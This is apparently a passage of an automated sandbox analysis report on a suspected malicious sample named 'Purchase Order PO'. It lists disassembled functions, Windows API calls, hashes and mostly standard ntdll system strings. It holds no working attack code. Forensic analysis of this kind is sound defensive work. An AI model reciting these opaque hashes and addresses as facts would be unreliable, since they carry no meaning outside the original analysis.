                                                              • Instruction Fuzzy Hash: 5D0140B3E0005876D7105EA55CC1CEFBB7CDE84754F4040ABFA0497201E66E4E024BA5
                                                              Function 0042C9E3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 41 42c9e3-42ca24 call 404783 call 42d8c3 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CA1F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Purchase Order PO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: wdA
                                                              • API String ID: 3298025750-2931128418
                                                              • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                              • Instruction ID: 9a34639f9b590f445554bb3374e68085bc2f8b1a53e3d8f22fb1199bbd37af40
                                                              • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                              • Instruction Fuzzy Hash: E6E06D72604205BBD614EF59EC85FAB37ADDFC9714F004419FE18A7242C671B9118AB8
                                                              Function 0042C993 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 371 42c993-42c9d4 call 404783 call 42d8c3 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E4EE,?,?,00000000,?,0041E4EE,?,?,?), ref: 0042C9CF
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Purchase Order PO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                              • Instruction ID: 36e320101d405b986edb5f0360d5375c690b058552b8fab17163e86361dfcef2
                                                              • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                              • Instruction Fuzzy Hash: D6E06DB2604204BBD714EE99EC41EAB77ACDFC5750F004419FD18A7282D671B9108BB9
                                                              Function 0042CA33 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 381 42ca33-42ca6c call 404783 call 42d8c3 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,5B435AB9,?,?,5B435AB9), ref: 0042CA67
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2437240336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Purchase Order PO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                              • Instruction ID: e0f95e071271af0ef5bae3a3abc99ff131e4bcb123f1ba6cdcf3cfbd638433f3
                                                              • Opcode Fuzzy Hash: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                              • Instruction Fuzzy Hash: 4CE04F766002187BD220AA9AEC41F97775CDFC9714F50441AFA1867182C6717A1586A4
                                                              Function 00FC2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 386 fc2c0a-fc2c0f 387 fc2c1f-fc2c26 LdrInitializeThunk 386->387 388 fc2c11-fc2c18 386->388
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 958f8d593507492158f5b5d33dfb6ecd212d47c7953d78dbffd6ae40332e2eb4
                                                              • Instruction ID: dc63b5c727b5e34f658d53b19421ac543efb9d59baa997e568f839c79ca45ffb
                                                              • Opcode Fuzzy Hash: 958f8d593507492158f5b5d33dfb6ecd212d47c7953d78dbffd6ae40332e2eb4
                                                              • Instruction Fuzzy Hash: D4B04C719015D595DA51E7608609B1A7911A790751F19C066D2020651A47288591F175

                                                              Non-executed Functions

                                                              Function 01038D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Strings
                                                              • a NULL pointer, xrefs: 01038F90
                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01038F2D
                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01038DC4
                                                              • *** then kb to get the faulting stack, xrefs: 01038FCC
                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01038F34
                                                              • This failed because of error %Ix., xrefs: 01038EF6
                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01038E4B
                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01038DB5
                                                              • Go determine why that thread has not released the critical section., xrefs: 01038E75
                                                              • The critical section is owned by thread %p., xrefs: 01038E69
                                                              • <unknown>, xrefs: 01038D2E, 01038D81, 01038E00, 01038E49, 01038EC7, 01038F3E
                                                              • *** Inpage error in %ws:%s, xrefs: 01038EC8
                                                              • an invalid address, %p, xrefs: 01038F7F
                                                              • The resource is owned shared by %d threads, xrefs: 01038E2E
                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01038DA3
                                                              • The instruction at %p referenced memory at %p., xrefs: 01038EE2
                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01038E86
                                                              • read from, xrefs: 01038F5D, 01038F62
                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01038F26
                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 01038F3F
                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01038E3F
                                                              • The resource is owned exclusively by thread %p, xrefs: 01038E24
                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01038FEF
                                                              • *** enter .cxr %p for the context, xrefs: 01038FBD
                                                              • The instruction at %p tried to %s , xrefs: 01038F66
                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01038D8C
                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 01038E02
                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01038DD3
                                                              • *** enter .exr %p for the exception record, xrefs: 01038FA1
                                                              • write to, xrefs: 01038F56
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                              • API String ID: 0-108210295
                                                              • Opcode ID: 0697f5b4b259babab4c76ff074342a2bc45fa42180b0e275da1693215451ad72
                                                              • Instruction ID: b2888ca8948f72e9a3bb34c6589bf59237b31b14bdeee2e8ad65d1c9805a35d8
                                                              • Opcode Fuzzy Hash: 0697f5b4b259babab4c76ff074342a2bc45fa42180b0e275da1693215451ad72
                                                              • Instruction Fuzzy Hash: AD811979A04211BFEB26AA188C45DAB3F79DF96B10F0181C6F2486F192E3B1C501F663
                                                              Function 01002349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 112e872eb16cf9e0fcf79945d565de32ef6d6ce2a9b6c9b280c75d919955438e
                                                              • Instruction ID: 369be5cb49e7c2859e67c89ac2d129d9c3707db3df777e1abb3fea2ae1ee3abc
                                                              • Opcode Fuzzy Hash: 112e872eb16cf9e0fcf79945d565de32ef6d6ce2a9b6c9b280c75d919955438e
                                                              • Instruction Fuzzy Hash: D5929C71604741AFF762DE28C885B6BB7E8BB88750F04482DFAC4D7291D774E844CB92
                                                              Function 00FB8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • corrupted critical section, xrefs: 00FF54C2
                                                              • double initialized or corrupted critical section, xrefs: 00FF5508
                                                              • Thread identifier, xrefs: 00FF553A
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FF540A, 00FF5496, 00FF5519
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FF54CE
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 00FF5543
                                                              • undeleted critical section in freed memory, xrefs: 00FF542B
                                                              • Critical section address, xrefs: 00FF5425, 00FF54BC, 00FF5534
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FF54E2
                                                              • Address of the debug info found in the active list., xrefs: 00FF54AE, 00FF54FA
                                                              • Invalid debug info address of this critical section, xrefs: 00FF54B6
                                                              • Critical section debug info address, xrefs: 00FF541F, 00FF552E
                                                              • 8, xrefs: 00FF52E3
                                                              • Critical section address., xrefs: 00FF5502
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: 8dab0d17447a3cfeb54532860d17e6bd59744ec486392a9d04a227706a0881ba
                                                              • Instruction ID: f5e8897e566d277529d64ff338b896593583be1eed989def5c28cf8e2acc8812
                                                              • Opcode Fuzzy Hash: 8dab0d17447a3cfeb54532860d17e6bd59744ec486392a9d04a227706a0881ba
                                                              • Instruction Fuzzy Hash: 2C819EB1E00748EFDB20CF95C841BAEBBB9BF48B54F144119F604B7290D775A941EB51
                                                              Function 00FB29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00FF2498
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00FF24C0
                                                              • @, xrefs: 00FF259B
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 00FF261F
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00FF2412
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00FF2409
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00FF2602
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00FF25EB
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00FF2506
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00FF2624
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00FF22E4
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              • Opcode ID: c9c9213500e358bf680d9655aaf3d42efec713ae86b90e39e6c3993bd37ef2b6
                                                              • Instruction ID: d70137af69bdc2166413adb1fbb39d3a0352026e12f0db66d0932f6a4af8a000
                                                              • Opcode Fuzzy Hash: c9c9213500e358bf680d9655aaf3d42efec713ae86b90e39e6c3993bd37ef2b6
                                                              • Instruction Fuzzy Hash: 59027EF2D042299BDB71DB14CC81BEEB7B8AF44714F0041DAA609A7251EB709F84EF59
                                                              Function 01028B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              • Opcode ID: 4813bab8459d31bc32a14134114a0148aa092fc89cca04adfec6204cb53f2202
                                                              • Instruction ID: 6373236397890163936d9f207723d89d30cd5db3153076b7125a0b95b5985235
                                                              • Opcode Fuzzy Hash: 4813bab8459d31bc32a14134114a0148aa092fc89cca04adfec6204cb53f2202
                                                              • Instruction Fuzzy Hash: CA51F2755083259BC325EF189849BABBBECFF84340F24891EFA98C3241E770D508DB92
                                                              Function 01030274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: b1facc61e1d1961c5193c5f425ff47d1175e810ae15b6633f66c5cbb3271dc2c
                                                              • Instruction ID: 4d189e92302f778b4274ffe76489b03aee90ba14e69b868509b3c3bc93ee35b6
                                                              • Opcode Fuzzy Hash: b1facc61e1d1961c5193c5f425ff47d1175e810ae15b6633f66c5cbb3271dc2c
                                                              • Instruction Fuzzy Hash: D7D1E231901645DFDB62DF68C841AAEBBF9FF8A700F08C09AF5899B256C739D940DB11
                                                              Function 010089B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01008A67
                                                              • HandleTraces, xrefs: 01008C8F
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01008B8F
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01008A3D
                                                              • VerifierDlls, xrefs: 01008CBD
                                                              • VerifierFlags, xrefs: 01008C50
                                                              • VerifierDebug, xrefs: 01008CA5
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              • Opcode ID: 27391508b11807c73aed339773dca289e009481fec7c85f983b10174ae0e7c89
                                                              • Instruction ID: df866ec5cb8d3cf2d92c8e3e9bbec8b0cb03a66fcd62d8a2103d6b259b816a76
                                                              • Opcode Fuzzy Hash: 27391508b11807c73aed339773dca289e009481fec7c85f983b10174ae0e7c89
                                                              • Instruction Fuzzy Hash: 7A912171E00705ABF723EF288C81B9A77E4BB45714F05855AFAC56B2C2C735AC01CB96
                                                              Function 00F8EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              • Opcode ID: 62dc64212e824132018a2be9fa8e80eca28601f18ea2f257972533a07703028d
                                                              • Instruction ID: 5a02b944c3ef7228d68a9c55e04dbc890cbd1ccfc1b4cbc08093ea29633d4126
                                                              • Opcode Fuzzy Hash: 62dc64212e824132018a2be9fa8e80eca28601f18ea2f257972533a07703028d
                                                              • Instruction Fuzzy Hash: 79A25A71E0566A8FDB64DF15CC887E9B7B1AF45310F2442EAD80DA7290DB34AE85EF00
                                                              Function 00FB63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: 7f60fd8f55fa49a00d96f11fa339931ca0cc651d7c9b93491c496396a84f153a
                                                              • Instruction ID: aa3301a49087b1151f6b2aed0604aded3736b008a84abf61439420e65d520ad8
                                                              • Opcode Fuzzy Hash: 7f60fd8f55fa49a00d96f11fa339931ca0cc651d7c9b93491c496396a84f153a
                                                              • Instruction Fuzzy Hash: 35910071E00A19DBEB35DB14DC45BFA77A0BF40B24F140128EA41BB291DBADA841FB91
                                                              Function 00FB2CF0 Relevance: 7.7, Strings: 6, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 00FF279C
                                                              • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 00FF276F
                                                              • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 00FF2706
                                                              • @, xrefs: 00FB2E4D
                                                              • \WinSxS\, xrefs: 00FB2E23
                                                              • .Local\, xrefs: 00FB2D91
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                              • API String ID: 0-3926108909
                                                              • Opcode ID: 4d2c09b757bb952db300108879229f0c96ad61358e440336def63ab1f6368980
                                                              • Instruction ID: 53f0faeb3995a215d898ef8279f00388806def4512a91451066633ce7721a5fe
                                                              • Opcode Fuzzy Hash: 4d2c09b757bb952db300108879229f0c96ad61358e440336def63ab1f6368980
                                                              • Instruction Fuzzy Hash: 7481ED726083029FDB61CF15C894AABB7E8FF89710F04895DF884CB291D774D944EBA2
                                                              Function 00F7645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 00FD9A11, 00FD9A3A
                                                              • LdrpInitShimEngine, xrefs: 00FD99F4, 00FD9A07, 00FD9A30
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00FD9A01
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00FD99ED
                                                              • apphelp.dll, xrefs: 00F76496
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00FD9A2A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: 0414f119f5922ed2021a9f4477f00c324f1059ae9db2ec897ebfe7338b6cda8e
                                                              • Instruction ID: 3a27753727ef7f15ab838d8deefbc6ce0da706370a43cd10b065ab5ffbd05bf5
                                                              • Opcode Fuzzy Hash: 0414f119f5922ed2021a9f4477f00c324f1059ae9db2ec897ebfe7338b6cda8e
                                                              • Instruction Fuzzy Hash: 9C51C2726087009BE320DF64CC42BAB77E9FB84754F14451AF5899B291D778E904FB93
                                                              Function 00FBC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializeProcess, xrefs: 00FBC6C4
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 00FBC6C3
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 00FF81E5
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 00FF8181, 00FF81F5
                                                              • Loading import redirection DLL: '%wZ', xrefs: 00FF8170
                                                              • LdrpInitializeImportRedirection, xrefs: 00FF8177, 00FF81EB
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: c0b33514ef5e43d8da6acf25d251aa4de844f8f764cf9d8742efe213c89cdefd
                                                              • Instruction ID: ca7df8437ea30dbc312c1cc1baa187392187bdde34b044516bd243f49dc7d1f7
                                                              • Opcode Fuzzy Hash: c0b33514ef5e43d8da6acf25d251aa4de844f8f764cf9d8742efe213c89cdefd
                                                              • Instruction Fuzzy Hash: C1311771B443059BD320EF28DD46E6B7795EF85B20F040518F985AB2E1DA28ED05EBA3
                                                              Function 00FB2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 00FF2165
                                                              • RtlGetAssemblyStorageRoot, xrefs: 00FF2160, 00FF219A, 00FF21BA
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00FF219F
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00FF21BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00FF2178
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00FF2180
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: ca0c43aec1436922e815a707e6a67445655f597fab9b683b0f0caeb2a6fd0c3e
                                                              • Instruction ID: 317c8a95fd62f7d0161b0eec85455063e625d10b0e2aaffffd4f7ed083ad141d
                                                              • Opcode Fuzzy Hash: ca0c43aec1436922e815a707e6a67445655f597fab9b683b0f0caeb2a6fd0c3e
                                                              • Instruction Fuzzy Hash: 58316632F4032977E721AAA68C85FAF7778DF61B50F240058BB04A7191D670DE00FBA5
